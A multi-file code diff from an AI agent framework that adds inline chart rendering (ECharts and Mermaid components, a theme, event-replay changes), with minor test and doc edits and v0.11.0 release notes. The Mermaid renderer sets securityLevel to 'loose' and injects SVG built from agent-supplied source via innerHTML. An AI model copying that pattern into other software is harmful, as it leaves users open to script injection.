@@ -429,12 +509,12 @@ export default function ToolsEditor({
}
>
<div className="flex flex-col">
{srv.tools.map((t) => {
{group.tools.map((t) => {
const enabled =
draftAllowed === null ? true : draftAllowed.has(t.name);
return (
<ToolRow
key={`${srv.name}-${t.name}`}
key={`${group.key}-${t.name}`}
name={t.name}
description={t.description}
enabled={enabled}
@@ -0,0 +1,158 @@
/**
* Per-call detail row for ``chart_*`` tool calls.
*
* The canonical embedding mechanism: when the agent invokes
* ``chart_render``, the runtime stores the result envelope in
* ``events.jsonl``; ``chat-helpers.replayEvent`` retains it and the
* chat panel dispatches it here. We read ``result.spec`` and mount
* the live renderer; ``result.file_url`` becomes the download link.
*
* Rules baked in:
* - The chart is reconstructed FROM THE TOOL RESULT, not from any
* markdown fence the agent might have written. Calling the tool
* IS the embedding — there's nothing else to remember.
* - The chart survives session reload because the spec lives in
* events.jsonl alongside the tool_call_completed event.
* - The downloadable PNG lives at ``result.file_url`` (a ``file://``
* URI on the runtime host). The web frontend can't open file://
* directly; we surface ``file_path`` as text and give a Copy
* button so the user can paste it into a file manager. (The
* desktop renderer has an Electron IPC bridge — not available
* in OSS.)
*/
import { lazy, Suspense, useState } from "react";
import { Copy, Loader2, Check } from "lucide-react";
// Lazy chunks so non-chart messages don't drag in echarts/mermaid.
const EChartsBlock = lazy(() => import("./EChartsBlock"));
const MermaidBlock = lazy(() => import("./MermaidBlock"));
export interface ChartToolEntry {
name: string;
done: boolean;
args?: unknown;
result?: unknown;
isError?: boolean;
callKey?: string;
}
interface ChartResult {
kind?: "echarts" | "mermaid";
spec?: unknown;
file_path?: string;
file_url?: string;
title?: string;
error?: string;
// Width/height come back from the server tool but are NOT displayed
// in the footer. Kept here so the live in-chat render can match the
// spec's native aspect ratio instead of forcing a 16:9 box that
// clips wide dashboards.
width?: number;
height?: number;
}
function asResult(v: unknown): ChartResult {
if (v && typeof v === "object") return v as ChartResult;
return {};
}
export default function ChartToolDetail({ entry }: { entry: ChartToolEntry }) {
const [copyState, setCopyState] = useState<"idle" | "copied">("idle");
// Still running: show a tiny inline spinner. Charts render fast (a
// few hundred ms), so a full skeleton would flash and feel janky.
if (!entry.done) {
return (
<div className="pl-10 mt-1.5">
<div className="flex items-center gap-2 text-[11px] text-muted-foreground">
<Loader2 className="w-3 h-3 animate-spin shrink-0" />
<span>rendering chart</span>
</div>
</div>
);
}
const result = asResult(entry.result);
if (result.error) {
// Errors are intentionally NOT shown to the user — the agent sees
// them in the tool result envelope and is expected to retry with a
// fixed spec.
return null;
}
const kind = result.kind;
const spec = result.spec;
if (!kind || spec === undefined) {
return null;
}
const handleCopyPath = async () => {
if (!result.file_path) return;
try {
await navigator.clipboard.writeText(result.file_path);
setCopyState("copied");
window.setTimeout(() => setCopyState("idle"), 2000);
} catch {
// Clipboard API unavailable (insecure context); silently no-op.
}
};
// Honor the spec's native aspect ratio when both dimensions are
// known (the server tool always returns them).
const aspectRatio =
result.width && result.height ? result.width / result.height : undefined;
return (
<div className="pl-10 mt-1.5 max-w-5xl">
<Suspense
fallback={
<div className="flex items-center gap-2 text-[11px] text-muted-foreground">
<Loader2 className="w-3 h-3 animate-spin" />
<span>loading chart engine</span>
</div>
}
>
{kind === "echarts" ? (
<EChartsBlock spec={spec} aspectRatio={aspectRatio} />
) : kind === "mermaid" ? (
<MermaidBlock source={typeof spec === "string" ? spec : ""} />
) : (
<div className="text-[11px] text-muted-foreground">
unknown chart kind: {String(kind)}
</div>
)}
</Suspense>
{/* Footer: title + path-copy. The PNG lives on the runtime host;
web browsers can't open file:// URIs from a hosted page, so
we surface the path as a copyable string instead of a fake
Download button. */}
<div className="flex items-center justify-between mt-2 px-1 text-[10.5px] text-muted-foreground/80">
<span className="truncate min-w-0 flex-1">
{result.title || kind}
</span>
{result.file_path && (
<button
type="button"
onClick={handleCopyPath}
className="inline-flex items-center gap-1 hover:text-foreground transition shrink-0 cursor-pointer"
title={
copyState === "copied"
? "Copied to clipboard"
: `Copy path: ${result.file_path}`
}
>
{copyState === "copied" ? (
<Check className="w-3 h-3 text-primary" />
) : (
<Copy className="w-3 h-3" />
)}
{copyState === "copied" ? "Copied" : "Copy path"}
</button>
)}
</div>
</div>
);
}
@@ -0,0 +1,232 @@
/**
* Live ECharts renderer for the chat bubble.
*
* Mounts an ECharts instance into a sized div and feeds it the spec
* the agent passed to `chart_render`. The same spec is rendered
* server-side to a PNG; the live render is the in-chat experience,
* the PNG is the downloadable.
*
* - Lazy-loaded via dynamic import so non-chart messages don't pay
* the ~1 MB bundle cost.
* - SVG renderer (`{ renderer: 'svg' }`) for crisp scaling and lower
* memory than canvas. Looks identical at chat-bubble sizes.
* - Resize handled via ResizeObserver; charts adapt to the bubble's
* width while keeping a fixed aspect ratio.
* - Error boundary inside the component itself: invalid specs render
* a tiny "spec invalid" pill with a copy-spec button so the agent
* can self-correct on the next turn.
*/
import { useEffect, useRef, useState } from "react";
import { AlertCircle } from "lucide-react";
import { buildOpenHiveTheme } from "./openhiveTheme";
interface Props {
spec: unknown;
/** Aspect ratio kept while the width adapts to the bubble. Defaults
* to 16:9 — the standard chart shape that fits in slide decks. */
aspectRatio?: number;
/** Hard cap on rendered height (px). Prevents very-tall charts from
* dominating the chat scroll. */
maxHeight?: number;
}
const _themeRegistered: Record<"light" | "dark", boolean> = {
light: false,
dark: false,
};
/**
* Detect the user's current UI theme from the DOM. The OpenHive
* desktop app applies a `dark` class to <html> in dark mode (see
* index.css). We use the same signal here so the live chart matches
* the surrounding chat — neither the agent nor the caller picks the
* theme, and the PNG download is rendered server-side from the same
* source of truth (HIVE_DESKTOP_THEME env, set by Electron from
* nativeTheme.shouldUseDarkColors).
*/
function useDocumentTheme(): "light" | "dark" {
const [theme, setTheme] = useState<"light" | "dark">(() =>
document.documentElement.classList.contains("dark") ? "dark" : "light",
);
useEffect(() => {
const obs = new MutationObserver(() => {
setTheme(
document.documentElement.classList.contains("dark") ? "dark" : "light",
);
});
obs.observe(document.documentElement, {
attributes: true,
attributeFilter: ["class"],
});
return () => obs.disconnect();
}, []);
return theme;
}
export default function EChartsBlock({
spec,
aspectRatio = 16 / 9,
maxHeight = 480,
}: Props) {
const containerRef = useRef<HTMLDivElement>(null);
const chartRef = useRef<unknown>(null); // echarts.ECharts instance, kept untyped to avoid coupling the type import
const [error, setError] = useState<string | null>(null);
// Theme follows the user's OpenHive UI mode automatically. Same
// signal feeds the server-side PNG render via HIVE_DESKTOP_THEME, so
// live chart and downloaded file always match.
const theme = useDocumentTheme();
useEffect(() => {
if (!containerRef.current) return;
let disposed = false;
let resizeObserver: ResizeObserver | null = null;
(async () => {
try {
const echarts = await import("echarts");
if (disposed || !containerRef.current) return;
// Register the OpenHive brand theme once per (theme, mode) so
// bar/line/etc. inherit our palette + cozy spacing instead of
// ECharts' generic-web-2010 defaults. Theme matches the
// server-side render via tools/src/chart_tools/theme.py.
const themeName = theme === "dark" ? "openhive-dark" : "openhive-light";
if (!_themeRegistered[theme]) {
echarts.registerTheme(themeName, buildOpenHiveTheme(theme));
_themeRegistered[theme] = true;
}
// Coerce string specs to objects (defensive — the agent should
// pass dicts but LLMs sometimes serialize before sending).
let parsedSpec: Record<string, unknown>;
if (typeof spec === "string") {
try {
parsedSpec = JSON.parse(spec);
} catch {
throw new Error("spec is a string and not valid JSON");
}
} else {
parsedSpec = spec as Record<string, unknown>;
}
// Disjoint-region layout policy. ECharts has no auto-layout
// for component overlap (verified against the option ref):
// title/legend/grid are absolutely positioned and ignore each
// other. We enforce three non-overlapping regions:
// - Title: anchored to TOP (top:16, no bottom)
// - Legend: anchored to BOTTOM (bottom:16, no top) except
// when orient:'vertical' (side legend stays where placed)
// - Grid: middle, with containLabel for axis labels
// Strips user-supplied vertical positions so an agent spec
// like `legend.top:"8%"` (which lands inside the title at
// chat-bubble dimensions — the 2026-05-01 bug) can't collide.
// Horizontal anchoring is preserved so left-aligned legends
// still work. Must mirror chart_tools/renderer.py exactly so
// the live chart and downloaded PNG look the same.
const userTitle = (parsedSpec.title as Record<string, unknown> | undefined) ?? {};
const userLegend = parsedSpec.legend as Record<string, unknown> | undefined;
const userGrid = (parsedSpec.grid as Record<string, unknown> | undefined) ?? {};
const legendVertical = userLegend?.orient === "vertical";
const stripV = (o: Record<string, unknown>) => {
const c = { ...o };
delete c.top;
delete c.bottom;
return c;
};
const normalizedSpec: Record<string, unknown> = {
...parsedSpec,
title: { left: "center", ...stripV(userTitle), top: 16 },
grid: {
left: 56,
right: 56,
...stripV(userGrid),
// Force vertical bounds — user-supplied grid.top/bottom
// (often percentage strings like "8%" the agent picks at
// default dims) don't generalize across chat-bubble sizes.
// 96 covers: bottom legend (~36) + xAxis name (containLabel
// handles tick labels but NOT axis name; outerBoundsMode is
// v6+ and we're on v5). 40 when no legend.
top: 64,
bottom: userLegend && !legendVertical ? 96 : 40,
containLabel: true,
},
};
if (userLegend) {
const legendDefaults = {
icon: "roundRect",
itemWidth: 12,
itemHeight: 12,
itemGap: 16,
};
normalizedSpec.legend = legendVertical
? { ...legendDefaults, ...userLegend }
: { ...legendDefaults, ...stripV(userLegend), bottom: 16 };
}
// Fresh chart instance per spec; cheaper than reuse + setOption
// for our sizes and avoids stale state between specs.
const chart = echarts.init(containerRef.current, themeName, {
renderer: "svg",
});
chartRef.current = chart;
chart.setOption(normalizedSpec, {
notMerge: true,
lazyUpdate: false,
});
// Resize on container size change.
resizeObserver = new ResizeObserver(() => {
if (chartRef.current && containerRef.current) {
(chartRef.current as { resize: () => void }).resize();
}
});
resizeObserver.observe(containerRef.current);
} catch (e) {
if (!disposed) {
setError(e instanceof Error ? e.message : String(e));
}
}
})();
return () => {
disposed = true;
if (resizeObserver) resizeObserver.disconnect();
if (chartRef.current) {
try {
(chartRef.current as { dispose: () => void }).dispose();
} catch {
// best-effort cleanup
}
chartRef.current = null;
}
};
}, [spec, theme]);
if (error) {
return (
<div
className="flex items-center gap-2 text-[11px] text-muted-foreground px-2.5 py-1.5 rounded-md border border-border/40 bg-muted/30"
role="alert"
>
<AlertCircle className="w-3 h-3 shrink-0" />
<span>chart spec invalid: {error}</span>
</div>
);
}
return (
<div
ref={containerRef}
// Transparent background so the chart blends with the chat bubble
// instead of sitting in an obtrusive white card. The OpenHive
// ECharts theme also sets backgroundColor: 'transparent' so the
// chart itself is see-through. Subtle rounded corners only.
className="w-full rounded-lg bg-transparent"
style={{
// Reserve aspect-ratio space so the chart doesn't pop in.
// ECharts will overwrite the inline style as it lays out.
aspectRatio,
maxHeight,
}}
/>
);
}
@@ -0,0 +1,81 @@
/**
* Live Mermaid renderer for the chat bubble.
*
* Renders a mermaid source string to an inline SVG. Mermaid is
* lazy-loaded so non-diagram messages don't pay the ~600 KB cost.
*
* Theme follows the OpenHive light/dark setting. Errors render a
* tiny pill so the agent gets feedback for the next turn.
*/
import { useEffect, useRef, useState } from "react";
import { AlertCircle } from "lucide-react";
interface Props {
source: string;
theme?: "light" | "dark";
}
let _mermaidInitialized = false;
export default function MermaidBlock({ source, theme = "light" }: Props) {
const ref = useRef<HTMLDivElement>(null);
const [error, setError] = useState<string | null>(null);
useEffect(() => {
let disposed = false;
(async () => {
try {
const mermaid = (await import("mermaid")).default;
if (!_mermaidInitialized) {
mermaid.initialize({
startOnLoad: false,
theme: theme === "dark" ? "dark" : "default",
securityLevel: "loose",
fontFamily:
"'Inter Tight', -apple-system, BlinkMacSystemFont, system-ui, sans-serif",
});
_mermaidInitialized = true;
}
if (disposed || !ref.current) return;
// Unique id per render to avoid conflicting injected styles.
const id = `mmd-${Math.random().toString(36).slice(2, 10)}`;
const { svg } = await mermaid.render(id, source);
if (disposed || !ref.current) return;
ref.current.innerHTML = svg;
} catch (e) {
if (!disposed) {
setError(e instanceof Error ? e.message : String(e));
}
}
})();
return () => {
disposed = true;
};
}, [source, theme]);
if (error) {
return (
<div
className="flex items-center gap-2 text-[11px] text-muted-foreground px-2.5 py-1.5 rounded-md border border-border/40 bg-muted/30"
role="alert"
>
<AlertCircle className="w-3 h-3 shrink-0" />
<span>diagram syntax invalid: {error}</span>
</div>
);
}
return (
<div
ref={ref}
// Match EChartsBlock: transparent so the diagram blends with the
// chat bubble; rounded corners and inner padding give breathing
// room without adding a visible card.
className="w-full overflow-x-auto rounded-lg bg-transparent p-4 [&_svg]:max-w-full [&_svg]:h-auto [&_svg]:mx-auto"
/>
);
}
@@ -0,0 +1,131 @@
/**
* OpenHive ECharts theme — must stay in sync with
* tools/src/chart_tools/theme.py on the runtime side.
*
* Same palette + spacing both for the live in-chat ECharts mount
* (see EChartsBlock.tsx) and the headless server-side render that
* produces the downloadable PNG. Without this both diverge: the chat
* shows ECharts default colors and the PNG shows OpenHive colors,
* confusing the user.
*/
const PALETTE_LIGHT = [
"#db6f02", // honey orange (primary)
"#456a8d", // slate blue
"#3d7a4a", // sage green
"#a8453d", // terracotta brick
"#c48820", // warm bronze
"#5d5b88", // indigo
"#7d6b51", // olive
"#8e4200", // rust
];
const PALETTE_DARK = [
"#ffb825",
"#7ba2c4",
"#7bb285",
"#d97470",
"#e0a83a",
"#9892c4",
"#b8a685",
"#d97e3a",
];
export function buildOpenHiveTheme(theme: "light" | "dark" = "light") {
const isDark = theme === "dark";
const fg = isDark ? "#e8e6e0" : "#1a1a1a";
const fgMuted = isDark ? "#8a8a8a" : "#6b6b6b";
const gridLine = isDark ? "#2a2724" : "#ebe9e2";
const axisLine = isDark ? "#3a3733" : "#d0cfca";
const tooltipBg = isDark ? "#181715" : "#ffffff";
const tooltipBorder = isDark ? "#2a2724" : "#d0cfca";
const palette = isDark ? PALETTE_DARK : PALETTE_LIGHT;
return {
color: palette,
backgroundColor: "transparent",
textStyle: {
fontFamily:
'"Inter Tight", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif',
color: fg,
fontSize: 12,
},
title: {
left: "center",
top: 28,
textStyle: { color: fg, fontSize: 16, fontWeight: 600 },
subtextStyle: { color: fgMuted, fontSize: 12 },
},
legend: {
top: 64,
icon: "roundRect",
itemWidth: 12,
itemHeight: 12,
itemGap: 20,
textStyle: { color: fgMuted, fontSize: 12 },
},
grid: {
top: 116,
left: 48,
right: 48,
bottom: 72,
containLabel: true,
},
categoryAxis: {
axisLine: { show: true, lineStyle: { color: axisLine } },
axisTick: { show: false },
axisLabel: { color: fgMuted, fontSize: 11, margin: 14 },
splitLine: { show: false },
nameLocation: "middle",
nameGap: 36,
nameTextStyle: { color: fgMuted, fontSize: 12 },
},
valueAxis: {
axisLine: { show: false },
axisTick: { show: false },
axisLabel: { color: fgMuted, fontSize: 11, margin: 14 },
splitLine: { lineStyle: { color: gridLine, type: "dashed" } },
nameLocation: "middle",
nameGap: 42,
nameTextStyle: { color: fgMuted, fontSize: 12, fontWeight: 500 },
// Don't auto-rotate value-axis names — the theme can't tell xAxis
// (horizontal bar) from yAxis (vertical bar), so rotating both at
// 90° vertical-mounts the xAxis name on horizontal-bar charts and
// it collides with the legend (peer_val regression). Let specs
// set nameRotate explicitly when they want a vertical y-name.
},
timeAxis: {
axisLine: { show: true, lineStyle: { color: axisLine } },
axisLabel: { color: fgMuted, fontSize: 11, margin: 14 },
splitLine: { show: false },
nameLocation: "middle",
nameGap: 36,
nameTextStyle: { color: fgMuted, fontSize: 12 },
},
tooltip: {
backgroundColor: tooltipBg,
borderColor: tooltipBorder,
borderWidth: 1,
padding: [8, 12],
textStyle: { color: fg, fontSize: 12 },
axisPointer: {
lineStyle: { color: axisLine, type: "dashed" },
crossStyle: { color: axisLine },
},
},
bar: { itemStyle: { borderRadius: [3, 3, 0, 0] } },
line: {
lineStyle: { width: 2.5 },
symbol: "circle",
symbolSize: 6,
},
candlestick: {
itemStyle: {
color: "#3d7a4a",
color0: "#a8453d",
borderColor: "#3d7a4a",
borderColor0: "#a8453d",
},
},
};
}
+83 -8
View File
@@ -295,12 +295,40 @@ export function sseEventToChatMessage(
* deferred `tool_call_completed` events can find the exact pill they belong
* to after the turn counter moves on.
*/
/**
* For chart_* tools we retain the args (from tool_call_started) and
* result envelope (from tool_call_completed) so the chat panel can
* render the live chart inline from the same spec the runtime
* rasterized to PNG. Other tools omit these fields to keep the
* tool_status content payload small (catalogs are pill-only).
*/
type ToolEntry = {
name: string;
done: boolean;
/** opaque per-call id surfaced to the UI; used to key React rows */
callKey?: string;
/** present only for tools whose name matches shouldRetainDetail */
args?: unknown;
result?: unknown;
isError?: boolean;
};
type ToolRowState = {
streamId: string;
executionId: string;
tools: Record<string, { name: string; done: boolean }>;
tools: Record<string, ToolEntry>;
};
/**
* Names whose detail (args + result envelope) we surface in the chat.
* Other tools stay pill-only — keeping their args/results out of the
* message content avoids ballooning the chat history with tool
* catalogs, file blobs, etc.
*/
function shouldRetainDetail(toolName: string): boolean {
return toolName.startsWith("chart_");
}
export interface ReplayState {
turnCounters: Record<string, number>;
toolRows: Record<string, ToolRowState>;
@@ -349,10 +377,20 @@ function toolLookupKey(
}
function toolRowContent(row: ToolRowState): string {
const tools = Object.values(row.tools).map((t) => ({
name: t.name,
done: t.done,
}));
const tools = Object.values(row.tools).map((t) => {
const out: ToolEntry = { name: t.name, done: t.done };
// Carry callKey + retained fields only for tools whose detail the
// UI mounts (chart_*). Pill-only tools stay terse so the
// tool_status payload doesn't grow with every catalog/file_ops
// call and existing snapshot tests stay valid.
if (shouldRetainDetail(t.name)) {
if (t.callKey !== undefined) out.callKey = t.callKey;
if (t.args !== undefined) out.args = t.args;
if (t.result !== undefined) out.result = t.result;
if (t.isError !== undefined) out.isError = t.isError;
}
return out;
});
const allDone = tools.length > 0 && tools.every((t) => t.done);
return JSON.stringify({ tools, allDone });
}
@@ -417,10 +455,19 @@ export function replayEvent(
tools: {},
});
const toolKey = toolUseId || `anonymous-${Object.keys(row.tools).length}`;
row.tools[toolKey] = {
const entry: ToolEntry = {
name: toolName,
done: false,
callKey: toolKey,
};
// Capture args at start for retained-detail tools so the chat
// can show what the agent rendered. Other tools' arguments are
// intentionally dropped to keep the tool_status JSON small.
if (shouldRetainDetail(toolName)) {
const toolInput = event.data?.tool_input;
if (toolInput !== undefined) entry.args = toolInput;
}
row.tools[toolKey] = entry;
if (toolUseId) {
state.toolUseToPill[toolLookupKey(streamId, event.execution_id, toolUseId)] = {
msgId: pillId,
@@ -453,10 +500,38 @@ export function replayEvent(
if (!tracked) break;
const row = state.toolRows[tracked.msgId];
if (!row) break;
row.tools[tracked.toolKey] = {
name: row.tools[tracked.toolKey]?.name || tracked.name,
const prior = row.tools[tracked.toolKey];
const completedName = prior?.name || tracked.name;
const completed: ToolEntry = {
name: completedName,
done: true,
callKey: tracked.toolKey,
};
// Preserve any args captured at start; capture the result
// envelope for retained-detail tools (chart_* needs spec/file_url
// to mount the live chart).
if (shouldRetainDetail(completedName)) {
if (prior?.args !== undefined) completed.args = prior.args;
const rawResult = event.data?.result;
if (rawResult !== undefined) {
// The framework serializes envelopes as JSON strings. Try to
// parse so the renderer can pick fields cheaply; fall back to
// the raw value when parsing fails (already-an-object or
// non-JSON string).
if (typeof rawResult === "string") {
try {
completed.result = JSON.parse(rawResult);
} catch {
completed.result = rawResult;
}
} else {
completed.result = rawResult;
}
}
const isErr = event.data?.is_error;
if (typeof isErr === "boolean") completed.isError = isErr;
}
row.tools[tracked.toolKey] = completed;
out.push({
id: tracked.msgId,
agent: effectiveName || event.node_id || "Agent",
+15
View File
@@ -60,6 +60,21 @@ _HIVE_PATH_NAMES = (
)
@pytest.fixture(autouse=True)
def _no_seed_mcp_defaults(monkeypatch):
"""Skip bundled-server seeding in MCPRegistry.initialize() for tests.
Production wants ``initialize()`` to seed ``hive_tools`` / ``gcu-tools``
/ ``files-tools`` / ``terminal-tools`` / ``chart-tools`` so a fresh
HIVE_HOME comes up with working defaults. Tests want a deterministic
empty registry every assertion about counts, "no servers installed"
output, or first-element identity breaks otherwise. Patching here
keeps the production API clean and avoids a test-only flag on
``initialize()``.
"""
monkeypatch.setattr(_mcp_registry.MCPRegistry, "_seed_defaults", lambda self: [])
@pytest.fixture(autouse=True)
def _isolate_hive_home_autouse(tmp_path, monkeypatch):
"""Per-test isolation of ``~/.hive`` to ``tmp_path/.hive``.
+1 -1
View File
@@ -889,7 +889,7 @@ def test_concurrency_safe_allowlist_is_conservative():
allowlist = ToolRegistry.CONCURRENCY_SAFE_TOOLS
# Positive assertions: known-safe read operations are present.
for name in ("read_file", "grep", "glob", "search_files", "web_search"):
for name in ("read_file", "terminal_rg", "terminal_find", "search_files", "web_scrape"):
assert name in allowlist, f"{name} should be concurrency-safe"
# Negative assertions: nothing that mutates state is allowed in.
+1 -1
View File
@@ -115,7 +115,7 @@ Hive LLM:
Notes:
- Set `provider` to `hive`
- Common Hive model values are `queen`, `kimi-2.5`, and `GLM-5`
- Common Hive model values are `queen`, `kimi-k2.5`, and `GLM-5`
- Hive LLM requests use the Hive endpoint at `https://api.adenhq.com`
### Search & Tools (optional)
+1 -1
View File
@@ -414,7 +414,7 @@ cd core && uv run python tests/dummy_agents/run_all.py --verbose
| parallel_merge | 4 | Fan-out/fan-in, failure strategies |
| retry | 4 | Retry mechanics, exhaustion, `ON_FAILURE` edges |
| feedback_loop | 3 | Feedback cycles, `max_node_visits` |
| worker | 4 | Real MCP tools (`example_tool`, `get_current_time`, `save_data`/`load_data`) |
| worker | 4 | Real MCP tools (`get_current_time`, `save_data`/`load_data`) |
Typical runtime is 13 minutes depending on provider latency.
+127
View File
@@ -0,0 +1,127 @@
# 🐝 Hive Agent v0.11.0: Action Plans, Charts, and a Cleaner Queen
> Major features released in Hive 0.11. Now Queen has an action plan for everything and charting capability to do analytics for you. Overall the conversation and agent experience is also improved a lot thanks to a major Queen prompt and tools refactor.
---
## ✨ Highlights
### 📋 Queen now keeps an action plan for everything
A new file-backed task system gives Queen a persistent, structured plan for every conversation — visible to the user, editable on the fly, and surviving session reload.
- **File-backed task store** under `core/framework/tasks/` with full CRUD, scoping, hooks, and reminders. Tasks live on disk so they outlast a single agent run and can be inspected, replayed, or shared between Queen and colony workers.
- **Multi-task creation in one call** — Queen can stage a whole plan up front instead of dripping out one task at a time, then tick items off as it works.
- **Colony task templates** — colonies can publish a template task list that Queen picks up when the colony is invoked, so recurring workflows start with the same plan every time.
- **Live task list in the UI** — a new `TaskListPanel` renders the plan in real time next to the chat, with item status flowing through the event bus as Queen marks tasks done.
- **Task reminders + hooks** wire into Queen's loop so the plan stays in front of the model and structural blockers preventing tool calls on `task_*` are now resolved.
### 📊 Charting capability for analytics
Queen can now produce real charts inline in the conversation, not just describe them.
- **New `chart_tools` MCP server** with ECharts and Mermaid renderers, an OpenHive theme, and a `chart-creation-foundations` skill that teaches Queen when to chart vs. when to table.
- **Inline chart rendering in chat** — `EChartsBlock` and `MermaidBlock` components render the chart spec directly in the transcript; tool results get a contentful display with `ChartToolDetail` instead of a JSON dump.
- **Chart spec normalization** in the renderer keeps Y-axis scaling, series colors, and theme tokens consistent regardless of how Queen phrases the spec.
### 🧹 Major Queen prompt + tools refactor
The biggest cleanup of Queen's tool surface and prompt since v0.7. Fewer, sharper tools; a shorter, more focused prompt; and a clearer model of what Queen has access to vs. what colonies do.
- **File ops consolidated** — `apply_diff`, `apply_patch`, `hashline_edit`, the old `data_tools`, `grep_search`, and the legacy `coder_tools_server` are gone. A single rewritten `file_ops` module covers read / search / list / edit with a more predictable interface and ~1.7k fewer lines on net.
- **Search and list-files unified** into one toolkit so Queen stops juggling near-duplicate variants.
- **Browser tools audit** — interactions, navigation, tabs, and lifecycle trimmed and consolidated; `web_scrape` and `browser_open` merged into a single web-search-and-open path.
- **New shell/terminal toolkit** (`shell_tools`) — replaces the old `execute_command_tool` and the inline command sanitizer with a typed module that has proper job control, PTY sessions, ring-buffered output, semantic exit codes, and a destructive-command warning gate. Five new preset skills (`shell-tools-foundations`, `-fs-search`, `-job-control`, `-pty-sessions`, `-troubleshooting`) teach Queen the new surface.
- **Old lifecycle tools removed** — `queen_lifecycle_tools.py` shrunk by ~900 lines as deprecated default tools came out.
- **Prompt simplification + improvements** — Queen's node prompts dropped redundant `_queen_style` blocks, tightened phrasing, and now lean on the task system for plan-keeping instead of restating the plan every turn.
- **Tools editor frontend grouping** — `ToolsEditor.tsx` groups tools by category so configuring a queen profile is no longer a flat scroll through 80+ entries.
---
## 🆕 What's New
### Tasks & Action Plans
- **`core/framework/tasks/`** — full task subsystem: `store`, `models`, `events`, `hooks`, `reminders`, `scoping`, plus a `tools/` package exposing session and colony task tools to Queen. (@RichardTang-Aden)
- **`POST /api/tasks` routes** for the frontend to read and mutate the live plan. (@RichardTang-Aden)
- **`TaskListPanel` + `TaskItem` + `TaskListContext`** on the frontend render the plan in real time. (@RichardTang-Aden)
- **Multi-task creation tool** lets Queen stage a whole plan in one call. (@RichardTang-Aden)
- **Colony task templates** — colonies ship with a default task list that Queen adopts on entry. (@RichardTang-Aden)
- **Hook + reminder fixes** so Queen reliably uses `task_*` tools instead of skipping them. (@RichardTang-Aden)
### Charts
- **`tools/src/chart_tools/`** — new MCP server with `renderer.py`, `theme.py`, `tools.py`, plus bundled `echarts.min.js` and `mermaid.min.js`. (@TimothyZhang7)
- **`chart-creation-foundations` skill** teaches Queen when and how to chart. (@TimothyZhang7)
- **`EChartsBlock` / `MermaidBlock` / `ChartToolDetail`** components render charts inline. (@TimothyZhang7)
- **OpenHive chart theme** (`openhiveTheme.ts`) keeps chart styling consistent with the rest of the UI. (@TimothyZhang7)
- **Chart spec normalization** in the renderer fixes Y-axis edge cases and series defaults. (@TimothyZhang7)
### Queen Prompt & Tools Refactor
- **Major file ops refactor** — single rewritten `file_ops` module replaces `apply_diff`, `apply_patch`, `hashline_edit`, `grep_search`, `data_tools`, and the legacy `coder_tools_server`. (@RichardTang-Aden)
- **Edit-file refactor** with a tighter API surface and ~560 lines of dead `test_file_ops_hashline.py` removed. (@RichardTang-Aden)
- **Search + list-files consolidation** into one toolkit. (@RichardTang-Aden)
- **Browser tools audit** — navigation, interactions, lifecycle, and tabs trimmed; `web_scrape` and browser-open merged. (@RichardTang-Aden)
- **`shell_tools` package** replaces `execute_command_tool` with proper job control, PTY sessions, ring-buffered output, semantic exit codes, and destructive-command warnings. (@TimothyZhang7)
- **Five new shell preset skills** plus reference docs (`exit_codes.md`, `find_predicates.md`, `ripgrep_cheatsheet.md`, `signals.md`). (@TimothyZhang7)
- **Old lifecycle tools removed** — `queen_lifecycle_tools.py` lost ~900 lines. (@RichardTang-Aden)
- **Autocompaction + concurrency tools updated** to play nicely with the new tool registry. (@RichardTang-Aden)
- **Prompt simplification** — `nodes/__init__.py` dropped redundant `_queen_style` block and tightened phrasing across nodes. (@RichardTang-Aden)
- **`ToolsEditor` grouping** — frontend tool-config screen now groups tools by category. (@RichardTang-Aden)
### Conversation & Agent Experience
- **`ask_user` questions surface in the chat transcript** instead of vanishing into a side panel, and the question bubble now defers until the user actually answers. (@bryan)
- **New-session navigation with Queen warm-up UI** — new `queen-routing.tsx` page handles the warm-up so the user sees progress instead of a blank screen. (@bryan)
- **Sync tool result contentful display** — tool results render as structured cards (charts, file diffs, etc.) instead of raw JSON. (@TimothyZhang7)
### Vision Fallback
- **Vision model retry + fallback** — non-vision models can now route image inputs through a captioning step instead of failing. (@RichardTang-Aden)
- **Vision fallback with intent** — caption prompts incorporate the user's intent so the caption is task-relevant. (@RichardTang-Aden)
- **Vision fallback auth** — fallback path now uses the right credentials per provider. (@RichardTang-Aden)
- **Looser max-token cap** on vision fallback for models that spend output tokens on internal thinking. (@RichardTang-Aden)
- **Vision fallback model usage logging** for cost visibility. (@RichardTang-Aden)
### Colonies
- **`POST /api/colonies/import`** — onboard a colony from a `tar` / `tar.gz` upload. 50 MB cap, manual path-traversal validation (Python 3.11 compatible), symlinks/hardlinks/devices rejected, mode bits masked. Tests cover happy path, name override, replace flag, traversal, absolute paths, and corrupt archives. (@RichardTang-Aden)
- **Refactored colony routes** — `routes_colonies.py` gained ~450 lines of structure for import/export/list flows. (@TimothyZhang7)
### MCP & Tools
- **SimilarWeb V5 integration** — 29 new MCP tools covering traffic & engagement, competitor intelligence, keywords/SERP, audience demographics, and segment analysis. Includes credential spec, health checker, README, and tests on Ubuntu and Windows. (#7066)
- **MCP registry initialization fix** — registry no longer races on first install. (@RichardTang-Aden)
---
## 🐛 Bug Fixes
- **Initial install** path resolution — hardcoded `HIVE_HOME` references replaced; all agent paths now prefixed by the resolved `HIVE_HOME`. (@RichardTang-Aden)
- **Frontend recovery** after a broken state on session reload. (@RichardTang-Aden)
- **Compaction issues** when the agent loop runs into the buffer mid-stream. (@RichardTang-Aden)
- **LiteLLM patch** for a streaming-usage edge case. (@RichardTang-Aden)
- **`ask_user` question bubble** now defers until the user answers. (@bryan)
- **Incubating-mode approval guidance** correctly injects into the prompt. (@RichardTang-Aden)
- **LLM debugger** — fixed timeline order and tool-call display. (@RichardTang-Aden)
- **Shell split-command** parsing fix. (@TimothyZhang7)
- **Chart Y-axis** + **chart spec normalization** edge cases. (@TimothyZhang7)
- **Scroll behavior** on certain element selectors. (@bryan)
- **CI fixes**: skills `HIVE_HOME` refactor regressions, `run_parallel_workers` losing task text on spawn, `test_capabilities` deprecated model identifiers, `test_colony_runtime_overseer` Windows flake. (#7141, #7149)
- **Orphan Zoho CRM test directory** removed under `src/` after the MCP refactor. (#7142)
- **Credentials** — `EnvVarStorage.exists` now matches `load` semantics for empty values. (#5680)
---
## 🚀 Upgrading from v0.10.5
No migration required. Pull `main` at `v0.11.0` and restart Hive — existing `~/.hive/` profiles, queens, colonies, and sessions keep working.
A few things to know:
